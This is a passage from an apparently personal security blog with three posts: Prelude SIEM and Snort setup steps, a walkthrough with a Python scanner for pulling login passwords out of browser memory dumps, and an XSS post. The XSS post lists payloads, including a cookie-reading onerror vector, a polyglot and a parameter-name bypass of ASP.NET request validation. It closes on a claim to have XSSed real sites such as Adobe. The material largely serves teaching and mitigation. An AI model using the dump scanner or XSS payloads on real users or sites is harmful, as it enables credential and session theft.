<span style="font-family: Verdana,sans-serif;">Information Event Management" (SIEM) system. Prelude collects, archives, normalizes, sorts, </span><br />
<span style="font-family: Verdana,sans-serif;">aggregates, correlates and reports all security-related events independently of the product brand or </span><br />
<span style="font-family: Verdana,sans-serif;">license giving rise to such events.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Easy steps to create a structure as shown in the figure.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht__cr0K6gX6BpAjQEZFmhQJwGWq7LAWneQdvkzPH7bUK0LeRyT9UTzQ9TmZRIB7JyJVKwTXLPFt6APcCiLjj9OsHCxFgVtH5l19U1es3ZmeXOh6i2Zhdutn_5OUCprY_Dz42fzSvPYXs/s1600/diag.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht__cr0K6gX6BpAjQEZFmhQJwGWq7LAWneQdvkzPH7bUK0LeRyT9UTzQ9TmZRIB7JyJVKwTXLPFt6APcCiLjj9OsHCxFgVtH5l19U1es3ZmeXOh6i2Zhdutn_5OUCprY_Dz42fzSvPYXs/s320/diag.PNG" height="180" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prerequisites: </b>Ubuntu server 12.0 </span><br />
<span style="font-family: Verdana,sans-serif;"> Any one log monitoring system ( My fav is snort) </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prewikka</b>.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get update</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get upgrade</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install ntpdate</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install dbconfig-common</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install rng-tools (Edit vi /etc/default/rng-tools ->HRNGDEVICE=/dev/urandom)</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install mysql-server</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prelude-Manager</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install prelude-manager (vi /etc/default/prelude-manager ->run= yes)</span><br />
<span style="font-family: Verdana,sans-serif;">(Edit /etc/prelude-manager/prelude-manager.conf for listen and relaying)</span><br />
<span style="font-family: Verdana,sans-serif;"> change the server ip on /etc/prelude/default/client.conf</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prelude-Correlator</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install prelude-correlator</span><br />
<span style="font-family: Verdana,sans-serif;">Registration of prelude-correlator:</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin register prelude-correlator "idmef:w admin:r" *managerhost* --uid 0 --gid 0 (uid and gid should be taken from /etc/passwd file)</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin registration-server prelude-manager</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prewikka</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Apt-get install apache2</span><br />
<span style="font-family: Verdana,sans-serif;">Apt-get install prewikka (add prewikka file containing following data on /etc/apache2/sites-available)</span><br />
<span style="font-family: Verdana,sans-serif;"><VirtualHost *:80></span><br />
<span style="font-family: Verdana,sans-serif;"> Setenv PREWIKKA_CONFIG "/etc/prewikka/prewikka.conf"</span><br />
<span style="font-family: Verdana,sans-serif;"><Location "/"></span><br />
<span style="font-family: Verdana,sans-serif;"> AllowOverride None</span><br />
<span style="font-family: Verdana,sans-serif;"> Options ExecCGI</span><br />
<span style="font-family: Verdana,sans-serif;"> <IfModule mod_mime.c></span><br />
<span style="font-family: Verdana,sans-serif;"> AddHandler cgi-script .cgi</span><br />
<span style="font-family: Verdana,sans-serif;"> </IfModule></span><br />
<span style="font-family: Verdana,sans-serif;"> Order allow,deny</span><br />
<span style="font-family: Verdana,sans-serif;"> Allow from all</span><br />
<span style="font-family: Verdana,sans-serif;"></Location></span><br />
<span style="font-family: Verdana,sans-serif;">Alias /prewikka/ /usr/share/prewikka/htdocs/ ScriptAlias / /usr/share/prewikka/cgi-bin/prewikka.cgi</span><br />
<span style="font-family: Verdana,sans-serif;"></VirtualHost></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"> On /usr/bin/prewikka-httpd change port 8000 to 80 and edit /etc/prewikka/prewikka.conf</span><br />
<span style="font-family: Verdana,sans-serif;">A2dissite (To disable Prewikka)</span><br />
<span style="font-family: Verdana,sans-serif;">A2ensite (To enable Prewikka)</span><br />
<span style="font-family: Verdana,sans-serif;">/etc/init.d/apache2 reload</span><br />
<span style="font-family: Verdana,sans-serif;">Change the permission of /etc/prewikka/prewikka.conf (chmod 766)</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Prelude-lml</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">apt-get install prelude-lml</span><br />
<span style="font-family: Verdana,sans-serif;">Check that it runs by typing prelude-lml.</span><br />
<span style="font-family: Verdana,sans-serif;">Registration of prelude-lml (run on the sensor host):</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin register prelude-lml "idmef:w admin:r" *managerhost* --uid 0 --gid 0 (use the uid and gid of the account prelude-lml runs as, taken from /etc/passwd; 0 is root)</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-admin registration-server prelude-manager (run on the manager host so that it accepts the registration)</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Relaying</b>:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">prelude-manager --relaying --parent-managers "x.x.x.x"</span><br />
<span style="font-family: Verdana,sans-serif;">To make it permanent, edit /etc/prelude-manager/prelude-manager.conf:</span><br />
<span style="font-family: Verdana,sans-serif;">[relaying] (uncomment this section)</span><br />
<span style="font-family: Verdana,sans-serif;">parent-managers = x.x.x.x</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Snort Installation</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">On snort-test machine:</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install gcc</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install g++</span><br />
<span style="font-family: Verdana,sans-serif;">Also needed, from packages: libgpg-error, libgcrypt, gnutls, pcre</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install libprelude-dev</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install libpreludedb-dev</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install prelude-lml(register prelude-lml)</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort-mysql</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort-rules-default</span><br />
<span style="font-family: Verdana,sans-serif;">apt-get install snort-common-libraries</span><br />
<span style="font-family: Verdana,sans-serif;">Open /etc/snort/snort.conf and edit the following:</span><br />
<span style="font-family: Verdana,sans-serif;">Scroll down to the line "# output alert_prelude: profile=snort", remove the leading "#", and that's it.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">prelude-adduser register snort "idmef:w" <manager address> --uid snort --gid snort (on the Snort agent; prelude-adduser is the older name of prelude-admin, use whichever your version ships)</span><br />
<span style="font-family: Verdana,sans-serif;">prelude-adduser registration-server prelude-manager (on the prelude-manager host)</span><br />
<span style="font-family: Verdana,sans-serif;">snort -c /etc/snort/snort.conf</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">With this your Prelude setup should be up and running in no time. Cheers!</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ6EO7ZwjD0XVrmz-c0tXOq2Z4Usf9z5LLWGl9OJNVlHWHMaesVWPXtl-FvsPddLygvxL9jk_zHHV1K1uJ88hZzHWr9Aw23drGRME0OkExbc8df8S4P_yHMG5FqhsuSXKzPcI_V0zDfV0/s1600/Prewikka_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ6EO7ZwjD0XVrmz-c0tXOq2Z4Usf9z5LLWGl9OJNVlHWHMaesVWPXtl-FvsPddLygvxL9jk_zHHV1K1uJ88hZzHWr9Aw23drGRME0OkExbc8df8S4P_yHMG5FqhsuSXKzPcI_V0zDfV0/s320/Prewikka_1.png" height="240" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-5852215625678373722012-09-28T00:27:00.001-07:002013-06-04T03:15:48.908-07:00Plain Text memory passwords<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">This vulnerability has been in the market for a very long time, but what made me write about it is my new project, a simple desktop application developed in VB. I won't talk much about that application here, but I will describe the attack [PTMP] against a few web applications on the internet.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Memory is a vital component of any application, be it a web app or a simple desktop app, and most of the time our login passwords sit unencrypted in the process memory. This post discusses the easiest ways to extract plain text passwords from any application that does not protect, or promptly wipe, the user password it holds in its process memory. Note what the attack requires: the ability to read another process's memory on the same machine, which means running as the same user or as an administrator. It does not make the web application remotely exploitable; it matters on shared machines, stolen laptops and hosts that already run malware.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">More insight</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Take a simple web application that prompts the user to enter a user ID and password on its login page (Gmail, for example).</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjvDv28YjNMKN0oVtl_0aDC-5HKfZG-CQLilpGmU4JlX-1MBqwIuVAfh6dEVUn57gfYwVNx4NnttZBTMXs-Hss1egPd7k6Gy40w7M5wGQjMoTrj8TIAby8X0QLClWFsrHCiDyx-Gj0xfs/s1600/login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjvDv28YjNMKN0oVtl_0aDC-5HKfZG-CQLilpGmU4JlX-1MBqwIuVAfh6dEVUn57gfYwVNx4NnttZBTMXs-Hss1egPd7k6Gy40w7M5wGQjMoTrj8TIAby8X0QLClWFsrHCiDyx-Gj0xfs/s320/login.png" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">So, coming back. After the authentication phase the password often remains in the browser's process memory, from where it can be extracted with a process dumper such as userdump or a memory viewer such as WinHex.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Here is a small PoC of PTMP:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Step by step:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">1) I closed all instances of my awesome Firefox and opened the Firefox pentesting profile I had created (I will probably write about how to create one in a future post).</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">2) Navigated to the website {https://www.google.com/xyz} and entered my login credentials</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">3) Now it's time to dump the process. For this I used userdump (http://www.microsoft.com/en-in/download/details.aspx?id=4060) and listed all the running processes [ userdump.exe -p ].</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6SWFaU8fcTdwpr0WpiX_p5Vq-2MAD5puZDwr4AjTCgMm7zBfbiUDBgvBYQ9R_-MwoAdtFGaZCL9tpdpSLwUUn-ikpxLqxhHSrCiPk9HasJK3UJvNZ3uQGITauUHkSTsEgxxgyGKLEsRI/s1600/userdump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6SWFaU8fcTdwpr0WpiX_p5Vq-2MAD5puZDwr4AjTCgMm7zBfbiUDBgvBYQ9R_-MwoAdtFGaZCL9tpdpSLwUUn-ikpxLqxhHSrCiPk9HasJK3UJvNZ3uQGITauUHkSTsEgxxgyGKLEsRI/s320/userdump.png" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">This lists all the running processes on my system, but what I am more interested in is a dump of firefox.exe.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg78UJ8xv_JeJEu_jc4IIj0R68JFY6siPyV5gsUj1akQduC77yB8YNrIqeS3m4r3s4gD5qlPzO5FM7DgxkUQ2NEuKfzPpPCFbC1VonfzpiQ6qXGm3jVK5gHTfJIIGxM3ibsel0CHjOaXs8/s1600/dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg78UJ8xv_JeJEu_jc4IIj0R68JFY6siPyV5gsUj1akQduC77yB8YNrIqeS3m4r3s4gD5qlPzO5FM7DgxkUQ2NEuKfzPpPCFbC1VonfzpiQ6qXGm3jVK5gHTfJIIGxM3ibsel0CHjOaXs8/s320/dump.png" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">The command to dump is "userdump firefox.exe" (the PID of the process, 5724 in this case, can be given instead of the name).</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">4) With the dump in hand, I extracted the readable strings from it using strings.exe from the Sysinternals suite ( strings.exe firefox.dmp > test.txt ).</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJrOvH4QAHXKnN7kHUFXDQGP_M9R1yf7cnHEFjfsIRPpEmf_xpPWZo51XCnjFUDkATMoAwhpAUin_xNpdDVEWgzXaGdq3NopI_2MP63IiH1tCJ4J7PPmXLu7Y9XK8MMNzfjYELTaL0Zuk/s1600/passwrd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJrOvH4QAHXKnN7kHUFXDQGP_M9R1yf7cnHEFjfsIRPpEmf_xpPWZo51XCnjFUDkATMoAwhpAUin_xNpdDVEWgzXaGdq3NopI_2MP63IiH1tCJ4J7PPmXLu7Y9XK8MMNzfjYELTaL0Zuk/s320/passwrd.PNG" width="320" /></a></span></div>
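<span style="font-family: Verdana,sans-serif;">As an added example (not part of the original post), the following Python script does what steps 3 and 4 do with strings.exe and a text search, but directly on the raw dump file: it looks for field=value pairs using the login form's field names, both as plain ASCII (the serialised POST body as the network layer wrote it) and as UTF-16LE (how the browser's JS engine and the Windows GUI hold text), and reports the byte offset of every hit. The field-name list, the Gmail-style "Passwd" included, and the embedded SAMPLE_DUMP are constructed for the example, not taken from a real dump; point scan_file() at a real .dmp to use it.</span><br />

```python
import re
import sys
from dataclasses import dataclass
from urllib.parse import unquote

# Form field names that usually carry the credential in a login POST body.
# "Passwd" was Gmail's field name at the time of the post; the rest are common
# defaults. The list is an assumption of this example: adapt it to the target.
CRED_FIELDS = ("Passwd", "password", "pass", "pwd")


@dataclass
class Hit:
    offset: int    # byte offset of the field name inside the dump
    encoding: str  # "ascii" or "utf-16le"
    field: str
    value: str     # URL-decoded value


def _ascii_regex(fields):
    # field=value as the network layer wrote it: URL-encoded, so the value runs
    # until the next '&', whitespace or NUL byte.
    names = b"|".join(re.escape(f.encode()) for f in fields)
    return re.compile(rb"(?i)\b(" + names + rb")=([^&\s\x00]{1,128})")


def _utf16_regex(fields):
    # The same pair as UTF-16LE: every ASCII character is followed by a NUL byte.
    # Matching on bytes, not on a decoded string, means odd offsets are found too.
    def wide(s):
        return b"".join(bytes([ord(c), 0]) for c in s)
    names = b"|".join(re.escape(wide(f)) for f in fields)
    return re.compile(rb"(?i)(" + names + rb")=\x00((?:[^&\s\x00]\x00){1,128})")


def find_credentials(dump: bytes, fields=CRED_FIELDS):
    """Return every field=value credential pair found in a raw memory dump."""
    hits = []
    for m in _ascii_regex(fields).finditer(dump):
        hits.append(Hit(m.start(), "ascii",
                        m.group(1).decode("latin-1"),
                        unquote(m.group(2).decode("latin-1"))))
    for m in _utf16_regex(fields).finditer(dump):
        hits.append(Hit(m.start(), "utf-16le",
                        m.group(1).decode("utf-16-le"),
                        unquote(m.group(2).decode("utf-16-le"))))
    return sorted(hits, key=lambda h: h.offset)


def scan_file(path: str):
    with open(path, "rb") as f:
        return find_credentials(f.read())


# Constructed stand-in for a userdump .dmp (not a real dump): filler bytes plus
# the two forms in which a submitted login body tends to survive in the browser
# process, the wide copy deliberately placed at an odd offset.
SAMPLE_DUMP = (
    b"\x00" * 64 + b"MZ\x90\x00" + b"A" * 30
    + b"Email=alice%40example.com&Passwd=Tr0ub4dor%3A3&signIn=Sign+in\r\n"
    + b"\x00" * 7
    + "Passwd=Tr0ub4dor:3".encode("utf-16-le")
    + b"\x00" * 32
)

if __name__ == "__main__":
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_credentials(SAMPLE_DUMP)
    for h in hits:
        print(f"0x{h.offset:08x} {h.encoding:8} {h.field}={h.value}")
```

<span style="font-family: Verdana,sans-serif;">Sysinternals strings.exe already extracts both ASCII and Unicode strings, so the text search in step 4 catches the UTF-16 copy as well; the point of scanning for the field names directly is that the password usually survives in more than one encoding and at more than one offset, which is also exactly what an application has to avoid keeping, or has to wipe, if it wants to resist this attack.</span><br />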
<br /></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com1tag:blogger.com,1999:blog-1982130572676896150.post-77086888717382149352012-09-27T02:19:00.000-07:002014-10-21T23:14:38.958-07:00Don't XSS me!<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana,sans-serif;">Cross-site scripting is an attack in which a malicious script is injected into a page and executed in the user's browser; the payload can be as dangerous as hijacking the user's valid session. XSS does not rely on a browser or operating system vulnerability; it targets the web application's flaws in handling input and writing it back into pages. In this post I highlight some of the mitigations and some well-known facts about XSS.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">When this vulnerability was first discussed it was considered a lame horse next to giants like SQL injection, until 4 October 2005, when the Samy worm took over MySpace in just a few hours. More details on this XSS worm can be found <a href="http://namb.la/popular/tech.html" target="_blank">here</a>.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">It is not always necessary to insert a <script> tag for XSS to work; sometimes the <script> tag is stripped by application filters, making that payload useless.</span><br />
<span style="font-family: Verdana,sans-serif;">A few more ways:</span><br />
<span style="font-family: Verdana,sans-serif;">a)<IMG SRC=j&#X41vascript:alert('hello')> (a javascript: URI in an image source; this only fired in very old browsers such as IE6 and is dead in anything current, but it still shows why a filter that looks for the literal string "javascript" fails)</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">b)<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> (an event handler on a broken image; no script tag and no javascript: URI, and it works in every current browser)</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">c)';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></span><br />
<span style="font-family: Verdana,sans-serif;">Vector c) is a polyglot: it tries to break out of a single-quoted string, a double-quoted string, a script block and an attribute value at once, so a single probe reveals which context the input lands in.</span><br />
<span style="font-family: Verdana,sans-serif;">For many more vectors see <a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank">RSnake's XSS Filter Evasion Cheat Sheet</a> (now maintained by OWASP).</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">This portion of the article is for developers who treat security as a major aspect rather than an afterthought behind a fancy UI. The most important thing to keep in mind before starting any web application assignment is that whatever input is collected from the client side cannot be trusted. Most web applications that do not need to accept rich data can use output escaping to largely eliminate the risk of XSS in a fairly straightforward manner: encode each untrusted value for the context it is written into (HTML body, attribute, JavaScript string, URL), because one encoder does not fit all contexts. Have a look at the XSS prevention cheat sheet <a href="https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet" target="_blank">here</a>. The OWASP ESAPI library (or, for Java, the lighter OWASP Java Encoder) is recommended for doing this encoding.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Some new attack vectors</b>:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Recently I came across a blog entry that describes a new way of looking at XSS attacks.</span><br />
<span style="font-family: Verdana,sans-serif;">Here the attack tweaks the parameter names rather than the parameter values.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">The conventional way an attacker would try:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">http://abc/test.aspx?a=<script>alert('xss')</script></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">But in an ASP.NET application ValidateRequest is enabled by default; it rejects a request whose parameter values contain HTML markup (it does not strip the markup, it aborts the request) and throws the error shown below.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28Ce5gldiEqGyT_DC52xSuA1vZACqjRNvp3v-KXe0hTM0j2PzVdfsv-Jkz7dwFP1v87LAmGBKb9nBg-Acn-BMyFLMgJ_b3cqndGfKf72rB_1pUE_uRPr4R15cGoXDD6CDRvpK6IJm54c/s1600/Xss-Error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28Ce5gldiEqGyT_DC52xSuA1vZACqjRNvp3v-KXe0hTM0j2PzVdfsv-Jkz7dwFP1v87LAmGBKb9nBg-Acn-BMyFLMgJ_b3cqndGfKf72rB_1pUE_uRPr4R15cGoXDD6CDRvpK6IJm54c/s320/Xss-Error.png" height="199" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">However, if we instead place the attack payload into a parameter name, ValidateRequest lets the request through, because it validates only parameter values, and we hit the vulnerable code:</span><br />
<span style="font-family: Verdana,sans-serif;">http://abc/test.aspx?<script>alert('xss')</script>=a</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1-OxZDPYqAlKBXHRd4sSnXbSlGasuqzPuXLVYR7ALxbLY3L82zbOQz2Y2oYl0k7ITij8HQn03rrRNiDSx08kkHM5-VSWgjfqNZ3kpwWyofqb3j9QtYRYjk87MfO06qSZUUDe3keFxAbY/s1600/Xss.pnj.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1-OxZDPYqAlKBXHRd4sSnXbSlGasuqzPuXLVYR7ALxbLY3L82zbOQz2Y2oYl0k7ITij8HQn03rrRNiDSx08kkHM5-VSWgjfqNZ3kpwWyofqb3j9QtYRYjk87MfO06qSZUUDe3keFxAbY/s320/Xss.pnj.PNG" height="200" width="320" /></a></span></div>
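<span style="font-family: Verdana,sans-serif;">To tie the two halves of this post together, here is an added Python example (not the post's code, nor Microsoft's or PortSwigger's) of the pattern just described: a value-only request validator in the style of ValidateRequest, a handler that reflects a parameter name and therefore stays exploitable through the name, and the hardened handler that drops the denylist and encodes every untrusted fragment for the context it is written into (HTML body, attribute value, JavaScript string). looks_dangerous() is a simplified stand-in for ASP.NET request validation, not its actual implementation, and the page fragments rendered are invented for the example.</span><br />

```python
import html
import json
from urllib.parse import parse_qsl

# The post's payload, reused below in value position and in name position.
PAYLOAD = "<script>alert('xss')</script>"

REQUEST_VALIDATION_ERROR = "A potentially dangerous Request.QueryString value was detected"


def looks_dangerous(s: str) -> bool:
    """Simplified stand-in for ValidateRequest (an assumption of this example,
    not the real implementation): flag '<' followed by a letter, '!', '/' or '?',
    and '&#'. It is a denylist, and the framework applies it to values only."""
    for i, ch in enumerate(s):
        nxt = s[i + 1:i + 2]
        if ch == "<" and (nxt.isalpha() or nxt in ("!", "/", "?")):
            return True
        if ch == "&" and nxt == "#":
            return True
    return False


def render_vulnerable(query: str) -> str:
    """Validates the values, then echoes the parameter *names* unescaped."""
    params = parse_qsl(query, keep_blank_values=True)
    for _, value in params:
        if looks_dangerous(value):
            raise ValueError(REQUEST_VALIDATION_ERROR)
    names = ", ".join(name for name, _ in params)
    return f"<p>Unknown parameters: {names}</p>"


def validation_rejects(query: str) -> bool:
    """True when the value-only validator aborts the request."""
    try:
        render_vulnerable(query)
    except ValueError:
        return True
    return False


# Hardened form: no denylist; every untrusted fragment, names included, is
# encoded for the exact context it lands in (OWASP XSS prevention rules 1 to 3).
def for_html_body(s: str) -> str:
    return html.escape(s, quote=True)


def for_attribute(s: str) -> str:
    # Only safe together with a double-quoted attribute, which render_safe uses.
    return html.escape(s, quote=True)


def for_js_string(s: str) -> str:
    # JSON-encode, then also turn <, > and & into \uXXXX escapes so the HTML
    # tokenizer can never see a closing script tag or a comment inside the literal.
    return (json.dumps(s)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def render_safe(query: str) -> str:
    params = parse_qsl(query, keep_blank_values=True)
    items = "".join(
        f'<li data-name="{for_attribute(n)}">{for_html_body(n)} = {for_html_body(v)}</li>'
        for n, v in params)
    first = params[0][0] if params else ""
    return (f"<ul>{items}</ul>"
            f"<script>var firstParam = {for_js_string(first)};</script>")


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD + "=a"))  # name reflected raw: exploitable
    print(render_safe(PAYLOAD + "=a"))        # same request, encoded per context
```

<span style="font-family: Verdana,sans-serif;">The lesson is the one the cheat sheet gives: input validation is a useful extra layer, but only output encoding chosen per context closes the hole, and it has to be applied to every untrusted fragment that reaches the page, parameter names and header values included, not just the ones the framework happened to check.</span><br />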
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">A few websites I have XSSed:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"> <b>Adobe</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
